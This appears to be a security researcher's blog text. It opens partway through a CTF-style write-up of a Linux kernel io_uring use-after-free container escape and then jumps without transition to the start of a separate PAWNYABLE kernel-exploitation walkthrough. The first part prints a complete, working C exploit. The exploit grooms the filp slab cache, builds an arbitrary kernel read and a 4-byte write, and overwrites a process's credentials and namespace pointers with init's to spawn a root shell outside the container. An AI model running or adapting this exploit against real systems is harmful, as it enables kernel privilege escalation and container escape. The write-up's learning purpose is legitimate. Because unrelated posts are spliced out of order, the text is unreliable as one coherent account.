They worked really well until I went to overwrite the target nsproxy member of our target child task_struct. One of those writes inevitably overwrote the members right next to nsproxy: signal and sighand. This caused big problems for me because as interrupts occurred, those members (pointers) would be deref’d and cause the kernel to panic since they were invalid values. So I opted to just the 4-byte write instead inside io_commit_cqring. The 4-byte write also caused problems in that at some points current has it’s creds checked and with what basically amounted to a torn 8-byte write, we would leave current cred values in invalid states during these checks. This is why I had to use a child process. Huge shoutout to @pqlpql for tipping me off to this.

Now we can just use those same steps to overwrite the three members real_cred, cred, and nsproxy and now our child has all of the same privileges and capabilities including visiblity into the host root file system that init does. This is perfect, but I still wasn’t able to get the flag!

I started to panic at this point that I had seriously done something wrong. The exploit if FULL of paranoid checks: I reread every overwritten value to make sure it’s correct for instance, so I was confident that I had done the writes properly. It felt like my namespace was somehow not effective yet in the child process, like it was cached somewhere. But then I remembered in Andy Nguyen’s blog post, he used his root privileges to explictly set his namespace values with calls to setns. Once I added this step, the child was able to see the root file system and find the flag. Instead of giving my child the same namespaces as init, I was able to give it the same namespaces of itself lol. I still haven’t followed through on this to determine how setns is implemented, but this could probably be done without explicit setns calls and only with our read and write tools:

// Our child waits to be given super powers and then drops into shell
void child_exec(void)
{
    // Change our taskname 
    if (prctl(PR_SET_NAME, TARGET_TASK, NULL, NULL, NULL) != 0)
    {
        err("`prctl()` failed");
    }

    while (1)
    {
        if (*(int *)g_shmem == 0x1337)
        {
            sleep(3);
            info("Child dropping into root shell...");
            if (setns(open("/proc/self/ns/mnt", O_RDONLY), 0) == -1) { err("`setns()`"); }
            if (setns(open("/proc/self/ns/pid", O_RDONLY), 0) == -1) { err("`setns()`"); }
            if (setns(open("/proc/self/ns/net", O_RDONLY), 0) == -1) { err("`setns()`"); }
            char *args[] = {"/bin/sh", NULL, NULL};
            execve(args[0], args, NULL);
        }

        else { sleep(2); }
    }
}

And finally I was able to drop into a root shell and capture the flag, escaping the container. One huge obstacle when I tried using my exploit on the Google infrastructure was that their kernel was compiled with SELinux support and my test environment was not. This ended up not being a big deal, I had some out of band confirmation/paranoia checks I had to leave out but fortunately the arbitrary read we used isn’t actually hooked in any way by SELinux unlike most of the other fcntl syscall flags. At that point remember, we don’t know enough information to fake any objects in memory so I’d be dead in the water if that read method was ruined by SELinux.

Conclusion

This was a lot of fun for me and I was able to learn a lot. I think these types of learning challenges are great and low-stakes. They can be fun to work on with friends as well, big thanks to everyone mentioned already and also @chompie1337 who had to listen to me freak out about not being able to read the flag once I had overwritten my creds. The exploit is posted below in full, let me know if you have any trouble understanding any of it, thanks.

// Compile
// gcc sploit.c -o sploit -l:liburing.a -static -Wall

#define _GNU_SOURCE
#include <sched.h>
#include <stdio.h>
#include <stdlib.h>
#include <errno.h>
#include <stdarg.h>
#include <fcntl.h>
#include <string.h>
#include <unistd.h>
#include <sys/time.h>
#include <sys/resource.h>
#include <sys/msg.h>
#include <sys/timerfd.h>
#include <sys/mman.h>
#include <sys/prctl.h>

#include "liburing.h"

// /sys/kernel/slab/filp/objs_per_slab
#define OBJS_PER_SLAB 16UL
// /sys/kernel/slab/filp/cpu_partial
#define CPU_PARTIAL 52UL
// Multiplier for cross-cache arithmetic
#define OVERFLOW_FACTOR 2UL
// Largest number of objects we could allocate per Cross-cache step
#define CROSS_CACHE_MAX 8192UL
// Fixed mapping in cpu_entry_area whose contents is NULL
#define NULL_MEM 0xfffffe0000002000UL
// Reading side of pipe
#define PIPE_READ 0
// Writing side of pipe
#define PIPE_WRITE 1
// error_entry inside cpu_entry_area pointer
#define ERROR_ENTRY_ADDR 0xfffffe0000002f48UL
// Offset from `error_entry` pointer to kernel base
#define EE_OFF 0xe0124dUL
// Kernel text signature
#define KERNEL_SIGNATURE 0x4801803f51258d48UL
// Offset from kernel base to init_task
#define INIT_OFF 0x18149c0UL
// Offset from task to task->comm
#define COMM_OFF 0x738UL
// Offset from task to task->real_cred
#define REAL_CRED_OFF 0x720UL
// Offset from task to task->cred
#define CRED_OFF 0x728UL
// Offset from task to task->nsproxy
#define NSPROXY_OFF 0x780UL
// Offset from task to task->files
#define FILES_OFF 0x770UL
// Offset from task->files to &task->files->fdt
#define FDT_OFF 0x20UL
// Offset from &task->files->fdt to &task->files->fdt->fd
#define FD_ARRAY_OFF 0x8UL
// Offset from task to task->tasks.next
#define TASKS_NEXT_OFF 0x458UL
// Process name to give root creds to 
#define TARGET_TASK "blegh2"
// Our process name
#define OUR_TASK "blegh1"
// Offset from kernel base to io_uring_fops
#define FOPS_OFF 0x1220200UL

// Shared memory with child
void *g_shmem;

// Child pid
pid_t g_child = -1;

// io_uring instance to use
struct io_uring g_ring = { 0 };

// UAF file handle
int g_uaf_fd = -1;

// Track pipes
struct fd_pair {
    int fd[2];
};
struct fd_pair g_pipe = { 0 };

// The offset on the page where our `file` is
size_t g_off = 0;

// Our fake file that is a copy of a legit io_uring fd
unsigned char g_ring_copy[256] = { 0 };

// Keep track of files added in Cross-cache steps
int g_cc1_fds[CROSS_CACHE_MAX] = { 0 };
size_t g_cc1_num = 0;
int g_cc2_fds[CROSS_CACHE_MAX] = { 0 };
size_t g_cc2_num = 0;
int g_cc3_fds[CROSS_CACHE_MAX] = { 0 };
size_t g_cc3_num = 0;

// Gadgets and offsets
uint64_t g_kern_base = 0;
uint64_t g_init_task = 0;
uint64_t g_target_task = 0;
uint64_t g_our_task = 0;
uint64_t g_cred_what = 0;
uint64_t g_nsproxy_what = 0;
uint64_t g_cred_where = 0;
uint64_t g_real_cred_where = 0;
uint64_t g_nsproxy_where = 0;
uint64_t g_files = 0;
uint64_t g_fdt = 0;
uint64_t g_file_array = 0;
uint64_t g_file_addr = 0;
uint64_t g_pipe_buf = 0;
uint64_t g_scratch = 0;
uint64_t g_fops = 0;

void err(const char* format, ...)
{
    if (!format) {
        exit(EXIT_FAILURE);
    }

    fprintf(stderr, "%s", "[!] ");
    va_list args;
    va_start(args, format);
    vfprintf(stderr, format, args);
    va_end(args);
    fprintf(stderr, ": %s\n", strerror(errno));

    sleep(5);
    exit(EXIT_FAILURE);
}

void info(const char* format, ...)
{
    if (!format) {
        return;
    }
    
    fprintf(stderr, "%s", "[*] ");
    va_list args;
    va_start(args, format);
    vfprintf(stderr, format, args);
    va_end(args);
    fprintf(stderr, "%s", "\n");
}

// Get FD for test file
int get_test_fd(int victim)
{
    // These are just different for kernel debugging purposes
    char *file = NULL;
    if (victim) { file = "/etc//passwd"; }
    else { file = "/etc/passwd"; }

    int fd = open(file, O_RDONLY);
    if (fd < 0)
    {
        err("`open()` failed, file: %s", file);
    }

    return fd;
}

// Set-up the file that we're going to use as our victim object
void alloc_victim_filp(void)
{
    // Open file to register
    g_uaf_fd = get_test_fd(1);
    info("Victim fd: %d", g_uaf_fd);

    // Register the file
    int ret = io_uring_register_files(&g_ring, &g_uaf_fd, 1);
    if (ret)
    {
        err("`io_uring_register_files()` failed");
    }

    // Get hold of the sqe
    struct io_uring_sqe *sqe = NULL;
    sqe = io_uring_get_sqe(&g_ring);
    if (!sqe)
    {
        err("`io_uring_get_sqe()` failed");
    }

    // Init sqe vals
    sqe->opcode = IORING_OP_MSG_RING;
    sqe->fd = 0;
    sqe->flags |= IOSQE_FIXED_FILE;

    ret = io_uring_submit(&g_ring);
    if (ret < 0)
    {
        err("`io_uring_submit()` failed");
    }

    struct io_uring_cqe *cqe;
    ret = io_uring_wait_cqe(&g_ring, &cqe);
}

// Set CPU affinity for calling process/thread
void pin_cpu(long cpu_id)
{
    cpu_set_t mask;
    CPU_ZERO(&mask);
    CPU_SET(cpu_id, &mask);
    if (sched_setaffinity(0, sizeof(mask), &mask) == -1)
    {
        err("`sched_setaffinity()` failed: %s", strerror(errno));
    }

    return;
}

// Increase the number of FDs we can have open
void increase_fds(void)
{
    struct rlimit old_lim, lim;
	
	if (getrlimit(RLIMIT_NOFILE, &old_lim) != 0)
    {
        err("`getrlimit()` failed: %s", strerror(errno));
    }
		
	lim.rlim_cur = old_lim.rlim_max;
	lim.rlim_max = old_lim.rlim_max;

	if (setrlimit(RLIMIT_NOFILE, &lim) != 0)
    {
		err("`setrlimit()` failed: %s", strerror(errno));
    }

    info("Increased fd limit from %d to %d", old_lim.rlim_cur, lim.rlim_cur);

    return;
}

void create_pipe(void)
{
    if (pipe(g_pipe.fd) == -1)
    {
        err("`pipe()` failed");
    }
}

void release_pipe(void)
{
    close(g_pipe.fd[PIPE_WRITE]);
    close(g_pipe.fd[PIPE_READ]);
}

// Our child waits to be given super powers and then drops into shell
void child_exec(void)
{
    // Change our taskname 
    if (prctl(PR_SET_NAME, TARGET_TASK, NULL, NULL, NULL) != 0)
    {
        err("`prctl()` failed");
    }

    while (1)
    {
        if (*(int *)g_shmem == 0x1337)
        {
            sleep(3);
            info("Child dropping into root shell...");
            if (setns(open("/proc/self/ns/mnt", O_RDONLY), 0) == -1) { err("`setns()`"); }
            if (setns(open("/proc/self/ns/pid", O_RDONLY), 0) == -1) { err("`setns()`"); }
            if (setns(open("/proc/self/ns/net", O_RDONLY), 0) == -1) { err("`setns()`"); }
            char *args[] = {"/bin/sh", NULL, NULL};
            execve(args[0], args, NULL);
        }

        else { sleep(2); }
    }
}

// Set-up environment for exploit
void setup_env(void)
{
    // Make sure a page is a page and we're not on some bullshit machine
    long page_sz = sysconf(_SC_PAGESIZE);
    if (page_sz != 4096L)
    {
        err("Page size was: %ld", page_sz);
    }

    // Pin to CPU 0
    pin_cpu(0);
    info("Pinned process to core-0");

    // Increase FD limit
    increase_fds();

    // Create shared mem
    g_shmem = mmap(
        (void *)0x1337000,
        page_sz,
        PROT_READ | PROT_WRITE,
        MAP_ANONYMOUS | MAP_FIXED | MAP_SHARED,
        -1,
        0
    );
    if (g_shmem == MAP_FAILED) { err("`mmap()` failed"); }
    info("Shared memory @ 0x%lx", g_shmem);

    // Create child
    g_child = fork();
    if (g_child == -1)
    {
        err("`fork()` failed");
    }

    // Child
    if (g_child ==  0)
    {
        child_exec();
    }
    info("Spawned child: %d", g_child);

    // Change our name
    if (prctl(PR_SET_NAME, OUR_TASK, NULL, NULL, NULL) != 0)
    {
        err("`prctl()` failed");
    }

    // Create io ring
    struct io_uring_params params = { 0 };
    if (io_uring_queue_init_params(8, &g_ring, &params))
    {
        err("`io_uring_queue_init_params()` failed");
    }
    info("Created io_uring");

    // Create pipe
    info("Creating pipe...");
    create_pipe();
}

// Decrement file->f_count to 0 and free the filp
void do_uaf(void)
{
    if (io_uring_unregister_files(&g_ring))
    {
        err("`io_uring_unregister_files()` failed");
    }

    // Let the free actually happen
    usleep(100000);
}

// Cross-cache 1:
// Allocate enough objects that we have definitely allocated enough
// slabs to fill up the partial list later when we free an object from each
// slab
void cc_1(void)
{
    // Calculate the amount of objects to spray
    uint64_t spray_amt = (OBJS_PER_SLAB * (CPU_PARTIAL + 1)) * OVERFLOW_FACTOR;
    g_cc1_num = spray_amt;

    // Paranoid
    if (spray_amt > CROSS_CACHE_MAX) { err("Illegal spray amount"); }

    //info("Spraying %lu `filp` objects...", spray_amt);
    for (uint64_t i = 0; i < spray_amt; i++)
    {
        g_cc1_fds[i] = get_test_fd(0);
    }
    usleep(100000);

    return;
}

// Cross-cache 2:
// Allocate OBJS_PER_SLAB to *probably* create a new active slab
void cc_2(void)
{
    // Step 2:
    // Allocate OBJS_PER_SLAB to *probably* create a new active slab
    uint64_t spray_amt = OBJS_PER_SLAB - 1;
    g_cc2_num = spray_amt;

    //info("Spraying %lu `filp` objects...", spray_amt);
    for (uint64_t i = 0; i < spray_amt; i++)
    {
        g_cc2_fds[i] = get_test_fd(0);
    }
    usleep(100000);

    return;
}

// Cross-cache 3:
// Allocate enough objects to definitely fill the rest of the active slab
// and start a new active slab
void cc_3(void)
{
    uint64_t spray_amt = OBJS_PER_SLAB + 1;
    g_cc3_num = spray_amt;

    //info("Spraying %lu `filp` objects...", spray_amt);
    for (uint64_t i = 0; i < spray_amt; i++)
    {
        g_cc3_fds[i] = get_test_fd(0);
    }
    usleep(100000);

    return;
}

// Cross-cache 4:
// Free all the filps from steps 2, and 3. This will place our victim 
// page in the partial list completely empty
void cc_4(void)
{
    //info("Freeing `filp` objects from CC2 and CC3...");
    for (size_t i = 0; i < g_cc2_num; i++)
    {
        close(g_cc2_fds[i]);
    }

    for (size_t i = 0; i < g_cc3_num; i++)
    {
        close(g_cc3_fds[i]);
    }
    usleep(100000);

    return;
}

// Cross-cache 5:
// Free an object for each slab we allocated in Step 1 to overflow the 
// partial list and get our empty slab in the partial list freed
void cc_5(void)
{
    //info("Freeing `filp` objects to overflow CPU partial list...");
    for (size_t i = 0; i < g_cc1_num; i++)
    {
        if (i % OBJS_PER_SLAB == 0)
        {
            close(g_cc1_fds[i]);
        }
    }
    usleep(100000);

    return;
}

// Reset all state associated with a cross-cache attempt
void cc_reset(void)
{
    // Close all the remaining FDs
    info("Resetting cross-cache state...");
    for (size_t i = 0; i < CROSS_CACHE_MAX; i++)
    {
        close(g_cc1_fds[i]);
        close(g_cc2_fds[i]);
        close(g_cc3_fds[i]);
    }

    // Reset number trackers
    g_cc1_num = 0;
    g_cc2_num = 0;
    g_cc3_num = 0;
}

// Do cross cache process
void do_cc(void)
{
    // Start cross-cache process
    cc_1();
    cc_2();

    // Allocate the victim filp
    alloc_victim_filp();

    // Free the victim filp
    do_uaf();

    // Resume cross-cache process
    cc_3();
    cc_4();
    cc_5();

    // Allow pages to be freed
    usleep(100000);
}

void reset_pipe_buf(void)
{
    char buf[4096] = { 0 };
    read(g_pipe.fd[PIPE_READ], buf, 4096);
}

void zero_pipe_buf(void)
{
    char buf[4096] = { 0 };
    write(g_pipe.fd[PIPE_WRITE], buf, 4096);
}

// Offset inside of inode to inode->i_write_hint
#define HINT_OFF 0x8fUL

// By using `fcntl(F_GET_RW_HINT)` we can read a single byte at
// file->inode->i_write_hint
uint64_t read_8_at(unsigned long addr)
{
    // Set the inode address
    uint64_t inode_addr_base = addr - HINT_OFF;

    // Set up the buffer for the arbitrary read
    unsigned char buf[4096] = { 0 };

    // Iterate 8 times to read 8 bytes
    uint64_t val = 0;
    for (size_t i = 0; i < 8; i++)
    {
        // Calculate inode address
        uint64_t target = inode_addr_base + i;

        // Set up a fake file 16 times (number of files per page), we don't know
        // yet which of the 16 slots our UAF file is at
        reset_pipe_buf();
        *(uint64_t *)&buf[0x20]  = target;
        *(uint64_t *)&buf[0x120] = target;
        *(uint64_t *)&buf[0x220] = target;
        *(uint64_t *)&buf[0x320] = target;
        *(uint64_t *)&buf[0x420] = target;
        *(uint64_t *)&buf[0x520] = target;
        *(uint64_t *)&buf[0x620] = target;
        *(uint64_t *)&buf[0x720] = target;
        *(uint64_t *)&buf[0x820] = target;
        *(uint64_t *)&buf[0x920] = target;
        *(uint64_t *)&buf[0xa20] = target;
        *(uint64_t *)&buf[0xb20] = target;
        *(uint64_t *)&buf[0xc20] = target;
        *(uint64_t *)&buf[0xd20] = target;
        *(uint64_t *)&buf[0xe20] = target;
        *(uint64_t *)&buf[0xf20] = target;

        // Create the content
        write(g_pipe.fd[PIPE_WRITE], buf, 4096);

        // Read one byte back
        uint64_t arg = 0;
        if (fcntl(g_uaf_fd, F_GET_RW_HINT, &arg) == -1)
        {
            err("`fcntl()` failed");
        };

        // Add to val
        val |= (arg << (i * 8));
    }

    return val;
}

void read_comm_at(unsigned long addr, char *comm)
{
    // Set the inode address
    uint64_t inode_addr_base = addr - HINT_OFF;

    // Set up the buffer for the arbitrary read
    unsigned char buf[4096] = { 0 };

    // Iterate 15 times to read 15 bytes
    for (size_t i = 0; i < 8; i++)
    {
        // Calculate inode address
        uint64_t target = inode_addr_base + i;

        // Set up a fake file 16 times (number of files per page), we don't know
        // yet which of the 16 slots our UAF file is at
        reset_pipe_buf();
        *(uint64_t *)&buf[0x20]  = target;
        *(uint64_t *)&buf[0x120] = target;
        *(uint64_t *)&buf[0x220] = target;
        *(uint64_t *)&buf[0x320] = target;
        *(uint64_t *)&buf[0x420] = target;
        *(uint64_t *)&buf[0x520] = target;
        *(uint64_t *)&buf[0x620] = target;
        *(uint64_t *)&buf[0x720] = target;
        *(uint64_t *)&buf[0x820] = target;
        *(uint64_t *)&buf[0x920] = target;
        *(uint64_t *)&buf[0xa20] = target;
        *(uint64_t *)&buf[0xb20] = target;
        *(uint64_t *)&buf[0xc20] = target;
        *(uint64_t *)&buf[0xd20] = target;
        *(uint64_t *)&buf[0xe20] = target;
        *(uint64_t *)&buf[0xf20] = target;

        // Create the content
        write(g_pipe.fd[PIPE_WRITE], buf, 4096);

        // Read one byte back
        uint64_t arg = 0;
        if (fcntl(g_uaf_fd, F_GET_RW_HINT, &arg) == -1)
        {
            err("`fcntl()` failed");
        };

        // Add to comm buf
        comm[i] = arg;
    }
}

void write_setup_ctx(char *buf, uint32_t what, uint64_t where)
{
    // Copy our copied real ring fd 
    memcpy(&buf[g_off], g_ring_copy, 256);

    // Set f->f_count to 1 
    uint64_t *count = (uint64_t *)&buf[g_off + 0x38];
    *count = 1;

    // Set f->private_data to our scratch space
    uint64_t *private_data = (uint64_t *)&buf[g_off + 0xc8];
    *private_data = g_scratch;

    // Set ctx->cqe_cached
    size_t cqe_cached = g_scratch + 0x240;
    cqe_cached &= 0xFFF;
    uint64_t *cached_ptr = (uint64_t *)&buf[cqe_cached];
    *cached_ptr = NULL_MEM;

    // Set ctx->cqe_sentinel
    size_t cqe_sentinel = g_scratch + 0x248;
    cqe_sentinel &= 0xFFF;
    uint64_t *sentinel_ptr = (uint64_t *)&buf[cqe_sentinel];

    // We need ctx->cqe_cached < ctx->cqe_sentinel
    *sentinel_ptr = NULL_MEM + 1;

    // Set ctx->rings so that ctx->rings->cq.tail is written to. That is at 
    // offset 0xc0 from cq base address
    size_t rings = g_scratch + 0x10;
    rings &= 0xFFF;
    uint64_t *rings_ptr = (uint64_t *)&buf[rings];
    *rings_ptr = where - 0xc0;

    // Set ctx->cached_cq_tail which is our what
    size_t cq_tail = g_scratch + 0x250;
    cq_tail &= 0xFFF;
    uint32_t *cq_tail_ptr = (uint32_t *)&buf[cq_tail];
    *cq_tail_ptr = what;

    // Set ctx->cq_wait the list head to itself (so that it's "empty")
    size_t real_cq_wait = g_scratch + 0x268;
    size_t cq_wait = (real_cq_wait & 0xFFF);
    uint64_t *cq_wait_ptr = (uint64_t *)&buf[cq_wait];
    *cq_wait_ptr = real_cq_wait;
}

void write_what_where(uint32_t what, uint64_t where)
{
    // Reset the page contents
    reset_pipe_buf();

    // Setup the fake file target ctx
    char buf[4096] = { 0 };
    write_setup_ctx(buf, what, where);

    // Set contents
    write(g_pipe.fd[PIPE_WRITE], buf, 4096);

    // Get an sqe
    struct io_uring_sqe *sqe = NULL;
    sqe = io_uring_get_sqe(&g_ring);
    if (!sqe)
    {
        err("`io_uring_get_sqe()` failed");
    }

    // Set values
    sqe->opcode = IORING_OP_MSG_RING;
    sqe->fd = g_uaf_fd;

    int ret = io_uring_submit(&g_ring);
    if (ret < 0)
    {
        err("`io_uring_submit()` failed");
    }

    // Wait for the completion
    struct io_uring_cqe *cqe;
    ret = io_uring_wait_cqe(&g_ring, &cqe);
}

// So in this kernel code path, after we're done with our write-what-where, the 
// what value actually gets incremented ++ style, so we have to decrement
// the values by one each time.
// Also, we only have a 4 byte write ability so we have to split up the 8 bytes
// into 2 separate writes
void overwrite_cred(void)
{
    uint32_t val_1 = g_cred_what & 0xFFFFFFFF;
    uint32_t val_2 = (g_cred_what >> 32) & 0xFFFFFFFF;

    write_what_where(val_1 - 1, g_cred_where);
    write_what_where(val_2 - 1, g_cred_where + 0x4);
}

void overwrite_real_cred(void)
{
    uint32_t val_1 = g_cred_what & 0xFFFFFFFF;
    uint32_t val_2 = (g_cred_what >> 32) & 0xFFFFFFFF;

    write_what_where(val_1 - 1, g_real_cred_where);
    write_what_where(val_2 - 1, g_real_cred_where + 0x4);
}

void overwrite_nsproxy(void)
{
    uint32_t val_1 = g_nsproxy_what & 0xFFFFFFFF;
    uint32_t val_2 = (g_nsproxy_what >> 32) & 0xFFFFFFFF;

    write_what_where(val_1 - 1, g_nsproxy_where);
    write_what_where(val_2 - 1, g_nsproxy_where + 0x4);
}

// Try to fuzzily validate leaked task addresses lol
int task_valid(uint64_t task)
{
    if ((uint16_t)(task >> 48) == 0xFFFF) { return 1; }
    else { return 0; } 
}

void traverse_tasks(void)
{    
    // Process name buf
    char current_comm[16] = { 0 };

    // Get the next task after init
    uint64_t current_next = read_8_at(g_init_task + TASKS_NEXT_OFF);
    uint64_t current = current_next - TASKS_NEXT_OFF;

    if (!task_valid(current))
    { 
        err("Invalid task after init: 0x%lx", current);    
    }

    // Read the comm
    read_comm_at(current + COMM_OFF, current_comm);
    //printf("    - Address: 0x%lx, Name: '%s'\n", current, current_comm);

    // While we don't have NULL, traverse the list
    while (task_valid(current))
    {
        current_next = read_8_at(current_next);
        current = current_next - TASKS_NEXT_OFF;

        if (current == g_init_task) { break; }

        // Read the comm
        read_comm_at(current + COMM_OFF, current_comm);
        //printf("    - Address: 0x%lx, Name: '%s'\n", current, current_comm);

        // If we find the target comm, save it
        if (!strcmp(current_comm, TARGET_TASK))
        {
            g_target_task = current;
        }

        // If we find our target comm, save it
        if (!strcmp(current_comm, OUR_TASK))
        {
            g_our_task = current;
        }
    }
}

void find_pipe_buf_addr(void)
{
    // Get the base of the files array
    uint64_t files_ptr = read_8_at(g_file_array);
    
    // Adjust the files_ptr to point to our fd in the array
    files_ptr += (sizeof(uint64_t) * g_uaf_fd);

    // Get the address of our UAF file struct
    uint64_t curr_file = read_8_at(files_ptr);

    // Calculate the offset
    g_off = curr_file & 0xFFF;

    // Set the globals
    g_file_addr = curr_file;
    g_pipe_buf = g_file_addr - g_off;

    return;
}

void make_ring_copy(void)
{
    // Get the base of the files array
    uint64_t files_ptr = read_8_at(g_file_array);
    
    // Adjust the files_ptr to point to our ring fd in the array
    files_ptr += (sizeof(uint64_t) * g_ring.ring_fd);

    // Get the address of our UAF file struct
    uint64_t curr_file = read_8_at(files_ptr);

    // Copy all the data into the buffer
    for (size_t i = 0; i < 32; i++)
    {
        uint64_t *val_ptr = (uint64_t *)&g_ring_copy[i * 8];
        *val_ptr = read_8_at(curr_file + (i * 8));
    }
}

// Here, all we're doing is determing what side of the page the UAF file is on,
// if its on the front half of the page, the back half is our scratch space
// and vice versa
void set_scratch_space(void)
{
    g_scratch = g_pipe_buf;
    if (g_off < 0x500) { g_scratch += 0x500; }
}

// We failed cross-cache stage, either because we didnt replace UAF object
void cc_fail(void)
{
    cc_reset();
    close(g_uaf_fd);
    g_uaf_fd = -1;
    release_pipe();
    create_pipe();
    sleep(1);
}

void write_pipe(unsigned char *buf)
{
    if (write(g_pipe.fd[PIPE_WRITE], buf, 4096) == -1)
    {
        err("`write()` failed");
    }
}

int main(int argc, char *argv[])
{
    info("Setting up exploit environment...");
    setup_env();

    // Create a debug buffer
    unsigned char buf[4096] = { 0 };
    memset(buf, 'A', 4096); 

retry_cc:
    // Do cross-cache attempt
    info("Attempting cross-cache...");
    do_cc();

    // Replace UAF file (and page) with pipe page
    write_pipe(buf);

    // Try to `lseek()` which should fail if we succeeded
    if (lseek(g_uaf_fd, 0, SEEK_SET) != -1)
    {
        printf("[!] Cross-cache failed, retrying...");
        cc_fail();
        goto retry_cc;
    }

    // Success
    info("Cross-cache succeeded");
    sleep(1);

    // Leak the `error_entry` pointer
    uint64_t error_entry = read_8_at(ERROR_ENTRY_ADDR);
    info("Leaked `error_entry` address: 0x%lx", error_entry);

    // Make sure it seems kernel-ish
    if ((uint16_t)(error_entry >> 48) != 0xFFFF)
    {
        err("Weird `error_entry` address: 0x%lx", error_entry);
    }

    // Set kernel base
    g_kern_base = error_entry - EE_OFF;
    info("Kernel base: 0x%lx", g_kern_base);

    // Read 8 bytes at that address and see if they match our signature
    uint64_t sig = read_8_at(g_kern_base);
    if (sig != KERNEL_SIGNATURE) 
    {
        err("Bad kernel signature: 0x%lx", sig);
    }

    // Set init_task
    g_init_task = g_kern_base + INIT_OFF;
    info("init_task @ 0x%lx", g_init_task);

    // Get the cred and nsproxy values
    g_cred_what = read_8_at(g_init_task + CRED_OFF);
    g_nsproxy_what = read_8_at(g_init_task + NSPROXY_OFF);

    if ((uint16_t)(g_cred_what >> 48) != 0xFFFF)
    {
        err("Weird init->cred value: 0x%lx", g_cred_what);
    }

    if ((uint16_t)(g_nsproxy_what >> 48) != 0xFFFF)
    {
        err("Weird init->nsproxy value: 0x%lx", g_nsproxy_what);
    }

    info("init cred address: 0x%lx", g_cred_what);
    info("init nsproxy address: 0x%lx", g_nsproxy_what);

    // Traverse the tasks list
    info("Traversing tasks linked list...");
    traverse_tasks();

    // Check to see if we succeeded
    if (!g_target_task) { err("Unable to find target task!"); }
    if (!g_our_task)    { err("Unable to find our task!"); }

    // We found the target task
    info("Found '%s' task @ 0x%lx", TARGET_TASK, g_target_task);
    info("Found '%s' task @ 0x%lx", OUR_TASK, g_our_task);

    // Set where gadgets
    g_cred_where = g_target_task + CRED_OFF;
    g_real_cred_where = g_target_task + REAL_CRED_OFF;
    g_nsproxy_where = g_target_task + NSPROXY_OFF;

    info("Target cred @ 0x%lx", g_cred_where);
    info("Target real_cred @ 0x%lx", g_real_cred_where);
    info("Target nsproxy @ 0x%lx", g_nsproxy_where);

    // Locate our file descriptor table
    g_files = g_our_task + FILES_OFF;
    g_fdt = read_8_at(g_files) + FDT_OFF;
    g_file_array = read_8_at(g_fdt) + FD_ARRAY_OFF;

    info("Our files @ 0x%lx", g_files);
    info("Our file descriptor table @ 0x%lx", g_fdt);
    info("Our file array @ 0x%lx", g_file_array);

    // Find our pipe address
    find_pipe_buf_addr();
    info("UAF file addr: 0x%lx", g_file_addr);
    info("Pipe buffer addr: 0x%lx", g_pipe_buf);

    // Set the global scratch space side of the page
    set_scratch_space();
    info("Scratch space base @ 0x%lx", g_scratch);

    // Make a copy of our real io_uring file descriptor since we need to fake
    // one
    info("Making copy of legitimate io_uring fd...");
    make_ring_copy();
    info("Copy done");

    // Overwrite our task's cred with init's
    info("Overwriting our cred with init's...");
    overwrite_cred();

    // Make sure it's correct
    uint64_t check_cred = read_8_at(g_cred_where);
    if (check_cred != g_cred_what)
    {
        err("check_cred: 0x%lx != g_cred_what: 0x%lx",
            check_cred, g_cred_what);
    }

    // Overwrite our real_cred with init's cred
    sleep(1);
    info("Overwriting our real_cred with init's...");
    overwrite_real_cred();

    // Make sure it's correct
    check_cred = read_8_at(g_real_cred_where);
    if (check_cred != g_cred_what)
    {
        err("check_cred: 0x%lx != g_cred_what: 0x%lx", check_cred, g_cred_what);
    }

    // Overwrite our nsproxy with init's
    sleep(1);
    info("Overwriting our nsproxy with init's...");
    overwrite_nsproxy();

    // Make sure it's correct
    check_cred = read_8_at(g_nsproxy_where);
    if (check_cred != g_nsproxy_what)
    {
        err("check_rec: 0x%lx != g_nsproxy_what: 0x%lx",
            check_cred, g_nsproxy_what);
    }

    info("Creds and namespace look good!");
    
    // Let the child loose
    *(int *)g_shmem = 0x1337;

    sleep(3000);
}

PAWNYABLE UAF Walkthrough (Holstein v3)

The Human Machine Interface

h0mbre

29 October 2022 at 04:00

Introduction

I’ve been wanting to learn Linux Kernel exploitation for some time and a couple months ago @ptrYudai from @zer0pts tweeted that they released the beta version of their website PAWNYABLE!, which is a “resource for middle to advanced learners to study Binary Exploitation”. The first section on the website with material already ready is “Linux Kernel”, so this was a perfect place to start learning.

The author does a great job explaining everything you need to know to get started, things like: setting up a debugging environment, CTF-specific tips, modern kernel exploitation mitigations, using QEMU, manipulating images, per-CPU slab caches, etc, so this blogpost will focus exclusively on my experience with the challenge and the way I decided to solve it. I’m going to try and limit redundant information within this blogpost so if you have any questions, it’s best to consult PAWNYABLE and the other linked resources.

What I Started With

PAWNYABLE ended up being a great way for me to start learning about Linux Kernel exploitation, mainly because I didn’t have to spend any time getting up to speed on a kernel subsystem in order to start wading into the exploitation metagame. For instance, if you are the type of person who learns by doing, and you’re first attempt at learning about this stuff was to write your own exploit for CVE-2022-32250, you would first have to spend a considerable amount of time learning about Netfilter. Instead, PAWNYABLE gives you a straightforward example of a vulnerability in one of a handful of bug-classes, and then gets to work showing you how you could exploit it. I think this strategy is great for beginners like me. It’s worth noting that after having spent some time with PAWNYABLE, I have been able to write some exploits for real world bugs similar to CVE-2022-32250, so my strategy did prove to be fruitful (at least for me).

I’ve been doing low-level binary stuff (mostly on Linux) for the past 3 years. Initially I was very interested in learning binary exploitation but starting gravitating towards vulnerability discovery and fuzzing. Fuzzing has captivated me since early 2020, and developing my own fuzzing frameworks actually lead to me working as a full time software developer for the last couple of years. So after going pretty deep with fuzzing (objectively not that deep as it relates to the entire fuzzing space, but deep for the uninitiated) , I wanted to circle back and learn at least some aspect of binary exploitation that applied to modern targets.

The Linux Kernel, as a target, seemed like a happy marriage between multiple things: it’s relatively easy to write exploits for due to a lack of mitigations, exploitable bugs and their resulting exploits have a wide and high impact, and there are active bounty systems/programs for Linux Kernel exploits. As a quick side-note, there have been some tremendous strides made in the world of Linux Kernel fuzzing in the last few years so I knew that specializing in this space would allow me to get up to speed on those approaches/tools.

So coming into this, I had a pretty good foundation of basic binary exploitation (mostly dated Windows and Linux userland stuff), a few years of C development (to include a few Linux Kernel modules), and some reverse engineering skills.

What I Did

To get started, I read through the following PAWNYABLE sections (section names have been Google translated to English):

Introduction to kernel exploits
kernel debugging with gdb
security mechanism (Overview of Exploitation Mitigations)
Compile and transfer exploits (working with the kernel image)

This was great as a starting point because everything is so well organized you don’t have to spend time setting up your environment, its basically just copy pasting a few commands and you’re off and remotely debugging a kernel via GDB (with GEF even).

